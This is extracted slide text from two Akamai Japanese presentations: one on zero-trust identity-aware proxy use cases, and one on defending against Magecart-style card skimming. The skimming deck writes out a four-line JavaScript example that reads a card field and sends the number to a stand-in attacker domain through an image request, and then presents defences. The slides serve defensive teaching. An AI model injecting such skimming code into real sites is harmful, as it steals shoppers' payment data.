© 2019 Akamai | Confidential1

ID認識型プロキシ(IAP)ユースケース

アカマイ・テクノロジーズ合同会社マーケティング本部

© 2019 Akamai | Confidential

アプリ #2

アプリ #1

アプリ #3

ユーザーとデバイスが境界の外に移動

働き方改革グローバル化

分散するリソース、崩壊する境界型セキュリティ

アプリ#1

アプリ#2

アプリ#3

脅威が境界の内側に侵入

マルウェアの潜在＆攻撃の高度化

Office365

Salesforce

アプリ#2

アプリ#1

アプリ#3

アプリケーションとデータも外に移動

クラウドシフトSaaS/IaaSの利用

Office365

Salesforce

© 2019 Akamai | Confidential

ゼロトラストセキュリティのフレームワーク

https://go.forrester.com/blogs/what-ztx-means-for-vendors-and-users/

■ポイント1. ネットワークの内外を区別しない

2. どこからのアクセスであっても認証認可を求める

3. ユーザ/デバイスに応じたアプリ、データを最小権限許可

4. 振る舞いやログを常時モニタリングし対策を自動化する

ゼロトラストセキュリティ実装の一例ID認識型プロキシ

ID認識型プロキシ認証（多要素）認可シングルサインオン

データセンター

Apps/OS

AD/LDAP

IaaSAD/

LDAP

SaaS

IdP(e.g.Okta, OneLogin)

②セキュリティチェック

③セキュアアクセス

リモートワーカー

営業部社員

財務経理部社員

協力会社社員

①接続要求

マルチクラウド環境を想定

ID認識型プロキシの主要な4つのユースケース

VPNリスクからの脱却

クラウドへのセキュアアクセス サプライチェーン合併買収

大手製造業様

導入製品：EAA（IAP）課題 ITモダン化

オンプレ型アクセス基盤から脱却 レガシーアプリをインターネット経由 数百のサプライチェーン向けアプリ

働き方改革 従業員がどこでもセキュアに働ける環境 セキュリティとユーザビリティの最大化 インフラ・セキュリティのシンプル化

代理店、営業拠点、生産拠点合わせて10万人以上 拠点数: 国内外数百箇所 世界150カ国以上で活動 デジタルトランスフォーメーションが経営課題

既存のアーキテクチャ

RProxy

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPN

Multiple corporate WANs by M&A

SaaSIaaS

サプライチェーン

社員（M&A）

リモートワーカー

既存のアーキテクチャ

RProxy

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPN

Multiple corporate WANs by M&A

SaaSIaaS

リモートワーカー

社員（M&A）

オンプレミスの管理負荷

クラウドへのセキュアアクセス

クラウドに移行したトラフィックを境界型セキュリティで接続するのは、複雑かつ高コストとなる。クラウドごとに異なるネットワーク接続とID管理の分散により、非効率とセキュリティリスクが発生する。

Icewall

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPNSaaSIaaS

EAA Con

IAPCon

IAPCon

IAP

リモートワーカー

社員（M&A）

オンプレミスの管理負荷

クラウドへのセキュアアクセス

拠点から直接ブレークアウトし、IAPを通してあらゆるアプリへのアクセス管理を実施。SaaSに対するID統合管理と、IaaSへのセキュアなネットワーキングをシンプルに実現。

IAPによるゼロトラストアクセス

既存のアーキテクチャ

RProxy

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPN

Multiple corporate WANs by M&A

SaaSIaaS

社員（M&A）

オンプレミスの管理負荷

合併＆買収

企業のシステム統合を通して、複雑化するネットワークとセキュリティ。複数のネットワークセキュリティコンポーネントとIDの統合により、設計が極めて複雑化する。

Icewall

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPNSaaSIaaS

EAA Con

EAA Con

IAPCon

IAP

オンプレミスの管理負荷

合併＆買収

オンプレ、SaaS、IaaSへのアクセスを全てIAP経由に統合。一元的に管理されるIDとネットワーキングの統合。買収前後の組織における複雑な認可管理に対してIAPを単一の執行ポイントに出来る。

IAPによるゼロトラストアクセス

社員（M&A）

既存のアーキテクチャ

RProxy

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPN

Multiple corporate WANs by M&A

SaaSIaaS

リモートワーカー

オンプレミスの管理負荷

VPNリスクからの脱却

信頼をベースにネットワークレベルの接続を行うVPNは、セキュリティ設計が複雑となる。加えて、SaaS/IaaSへのアクセスが増加すると、自社DCへアクセスするトラフィックは、コスト負担となる。

Icewall

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPNSaaSIaaS

EAA Con

IAPCon

IAPCon

IAP

リモートワーカー

社員（M&A）

IAPによるゼロトラストアクセス

オンプレミスの管理負荷

VPNリスクからの脱却

リモートワーカーからのアクセスにもVPNは使わず、認証＆認可を用いたセキュアアクセス。SaaS、IaaSへのアクセスは自社境界を通らず効率的なクラウドIAP経由でのアクセス。

既存のアーキテクチャ

RProxy

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPN

Multiple corporate WANs by M&A

SaaS

サプライチェーン

オンプレミスの管理負荷

サプライチェーン

システムへのアクセスを許可する際に、適切な認可管理を行う事が必要。NWベースのアプローチでは、IDとの紐づけが困難であり、大きなセキュリティインシデントに繋がった事例もある。

IAPによるゼロトラストアクセス

Icewall

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPNSaaS

EAA Con

IAPCon

IAPCon

IAP

サプライチェーン

オンプレミスの管理負荷

サプライチェーン

サプライチェーンからのアクセスを「必要なものだけに」の最小権限認可制御。統合ID管理と連携し、シンプルなアクセス制御とネットワーキングを実現。

既存のアーキテクチャ

RProxy

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPN

Multiple corporate WANs by M&A

SaaS

オンプレミスの管理負荷

トロンボーンルーティング VPNによるセキュリティリスク

SaaSによるオーバーサブスクリプション 複雑なネットワーク 増加するMPLSコスト

冗長なID管理 システムごとの認証システム 信頼ベースの認可なしアクセス

社員（M&A）

リモートワーカー

サプライチェーン

IAPによるゼロトラストアクセス

Icewall

Internet Firewall

MPLS#1

MPLS#2

MPLS#3

Router

Router

Router

Data Center

Firewall

DCNWSpineRouterRouter

RouterRouter

RouterRouter

RouterRouter

App#1

App#1

App#1

App#A

App#B

DCNWLB

DCNWSpineDCNWLeaf

VPNSaaS

EAA Con

EAA Con

EAA Con

ゼロトラストベースの認証認可 IDの一元的な管理 分散したアプリケーションへのSSO IAAAとネットワークの一元管理 デバイスリスク適応型セキュリティ

EAA

社員（M&A）

リモートワーカー

サプライチェーン

ゼロトラストへの 8 つの段階

アプリケーション事前確認

アクセスプロキシ準備

テストラボ登録

セキュリティ向上

パフォーマンス向上

外部ユーザー登録

内部ユーザー登録

VLAN 移行

1 2 3 4 5 6 7 8

ゼロトラストへの 8 つの段階Akamai CTO の Charlie Gero によるゼロトラストへの包括的ガイドおよびロードマップ

ゼロトラスト・リファレンス・アーキテクチャ一般的な環境でゼロトラストを適用する方法についての簡単なビジュアルガイド

https://www.akamai.com/jp/ja/solutions/security/zero-trust-security-model.jsp

境界セキュリティを超える対策リスク低減のための包括的かつ実現可能なロードマップ

ありがとうございました。

hakaneko@akamai.com

https://www.linkedin.com/in/haru-kaneko-b709aa61/

Magecartやクレジットカードスキミングなど、標的を絞ったクライアントサイドアタックに対する防御方法

バンダリ・ハレンドラセキュリティ・プロダクト・マネージャ

クレジットカードスキミング攻撃の急増

British Airways: 35万以上のカード情報流出TicketMaster:４万以上のカード情報流出

Source:zdhet

Source:threatpost

API

API

ウェブ・セキュリティの現状

API

API

API

API

ユーザーが分散

クラウドA クラウドB オンプレミス

{API}

ボット、API,DDoSなど様々な攻撃

アプリケーション（ウェブ、API）

WAF APIセキュリティ ボット・マネージメント DDoS防御

API

API

攻撃のAttack Surfaceが拡大中：ユーザーも対象

API

API

API

API

ユーザーが分散

クラウドA クラウドB オンプレミス

{API}

ボット、API,DDoSなど様々な攻撃

アプリケーション（ウェブ、API）

WAF APIセキュリティ ボット・マネージメント DDoS防御

3rd Partyサーバー

3rd Party Script

3rd Partyサーバーへ攻撃

ユーザーへの攻撃

3rd Partyスクリプトが多くSupply Chain攻撃が増加中

Third party and Supply-chain code

External Code and Open source libraries

Inhouse Code and libraries

6248

In-houseリソース平均数

3rd Partyリソース平均数

フォームジャッキング攻撃手法（MageCart)

API

API

攻撃者C&C

xxxxxxxxxxxxxxxxxxx

クレジット・カード番号

決済

ユーザー

3rd Partyスクリプト

オリジン・サーバ

１．3rd Partyスクリプトやオリジンのスクリプトの改ざん

２．改ざんされたスクリプト含まれたアプリケーションをユーザーへ配信

３．ユーザーが決済ページにカード情報の入力

４．入力されたカード情報が直接攻撃者のC&Cサーバーへ送信

ブラウザーからデータ流出仕組み

xxxxxxxxxxxxxxxxxxx

クレジット・カード番号

決済

ウェブ・ブラウザー

XHR, WebSocket, Image作成、Iframeなど、外部と通信できる各手法

www.attackercc.com

新規画像作成を使った攻撃の例

ステップ１：カード番号をフィルドから読み込むvar credit_card_number=$("#credit_card_field").val();

ステップ２：新規画像オブジェクトの作成var image=new Image();

ステップ３：カード番号が含まれるURLの作成（ドメインは攻撃者のドメイン）var exfiltration_link="https://www.attackercc.com/"+credit_card_number;

ステップ４：攻撃者のサーバへカード情報の送信image.src=exfiltration_link;

British Airwaysへの攻撃に使われた手法(XHR)

フォームからカード情報の流出

XHR (XMLHttpRequest) or Ajax を利用しデータの流出

クライアント（ブラウザ）への攻撃の検知と防御

１．開発プロセスの改善

２．クライアント側のモニタリング

3．Content Security Policy(CSP)による防御

防御策１：開発プロセスの改善

１．アプリケーションに含まれるスクリプトの事前検証

２．信頼されたホストよりスクリプトの配信

３．セキュリティ・テスト

スクリプト配信する前にスクリプトのダウンロード・ソース、作成者などを事前に確認を行う必要があります。

特ににトランザクション・ページなどに絞られたドメインより配信することでリスクの低減可能

リリース前にペネトレーション・テストやSAST(Static Application Security Testing)特を行うことで改ざんされたスクリプトを検出することが可能。

防御策２：クライアント側のモニタリング

API

API

1. 各スクリプトの挙動監視例：ー xx.jsがcredit card情報アクセスしたー xx.jsが新規画像オブジェクト作成したー xx.jsが新規Iframe作成した

２. ブラウザーから外部への通信の監視例：ー xx.jsがXHRで不審なサーバーへアクセスしたー xx.jsが不審なサーバーへWebSocket通信開始した

xxxxxxxxxxxxxxxxxxx

クレジット・カード番号

決済

１．アプリ+監視ツール

２．監視ツールを利用しブラウザ側で情報収集

３．監視ツールによる収集された情報をオリジンへ送信

アプリケーション・サーバー

監視ツール:監視ツールはアプリケーションに組み込まれるツール。JavaScript形式の

ツールが多く使われています。動的に遮断可能なツールも存在します。

４．監視ツールによる収集された情報の分析し不正アクセスの検出

防御策３：Content Security Policy (CSP)による防御CSPによる防御

Source: Mozilla (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)

以下のような設定することで信頼されているドメイン（Whitelist）へしかブラウザから通信されない。

コンテンツセキュリティポリシー (CSP) は、クロスサイトスクリプティング (XSS) やデータイン

ジェクション攻撃などのような、特定の種類の攻撃を検知し、影響を軽減するために追加できるセキュリティレイヤーです。これらの攻撃はデータの窃取からサイトの改ざん、マルウェアの拡散に至るまで、様々な目的に用いられます。

© 2019 Akamai | Confidential32

Thank you